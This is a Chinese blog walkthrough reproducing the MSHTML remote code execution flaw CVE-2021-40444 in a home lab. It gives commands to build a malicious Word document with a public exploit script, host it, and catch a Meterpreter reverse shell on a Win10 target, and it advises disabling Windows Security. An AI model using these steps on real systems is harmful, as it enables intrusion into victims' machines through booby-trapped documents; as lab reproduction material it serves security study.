- 2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
1、漏洞详情:
- Microsoft MSHTML远程代码执行漏洞
- CVE-2021-40444
- 严重级别:严重 CVSS:8.8
- 被利用级别:检测到利用
- 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。
- 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档。
2、复现:
- 下载代码,到kali上:
- https://github.com/lockedbyte/CVE-2021-40444
- 没有安装kali的小伙伴,可以参照这篇文章


Kali linux最新版 安装方法以及常见问题解答
- 接着我们把源码复制到kali虚拟机上面
![图片[1]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210847302.png?imageView2/0/format/webp/q/75)
- 接着我们安装依赖,基本上直接复制,终端跑一边就好,我这里因为安装过了,所以提示会和你们不一样
sudo apt-get install lcab
![图片[2]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210848391.png?imageView2/0/format/webp/q/75)
打开msf生成dll木马文件
- 这里的ip需要自己去ifconfig获取一下,msf端口监听默认4444
![图片[3]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210849520.png?imageView2/0/format/webp/q/75)
- 接着我们生成恶意文档,将刚刚生成的dll文件,复制到下载的CVE-2021-40444-master文件夹中执行命令
python3 exploit.py generate http.dll http://192.168.60.128
- 生成后保存在CVE-2021-40444/out/document.docx
![图片[4]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210850838.png?imageView2/0/format/webp/q/75)
- 我们将该文档复制到win10靶机当中,然后依次开启msf和当前木马的监听
msf监听
依次输入一下命令
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
options
set lhost 192.168.60.128
set lport 4444
exploit
![图片[5]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210851153.png?imageView2/0/format/webp/q/75)
恶意文档监听
python3 exploit.py host 80
![图片[6]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210852737.png?imageView2/0/format/webp/q/75)
- 接着我们去win10里面打开刚刚生成的文档
![图片[7]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-134-1024x401.png)
然后我们查看kali监控就会发现,已经成功获取权限了
![图片[8]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210853541.png?imageView2/0/format/webp/q/75)
![图片[9]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://img.godyu.com/2023/12/20231226210854165.png?imageView2/0/format/webp/q/75)
- 当然这里面涉及木马免杀等程序,自己复现漏洞的时间,关闭安全中心就行
- 感谢大家看到这里,写文章不易,谢谢
THE END
暂无评论内容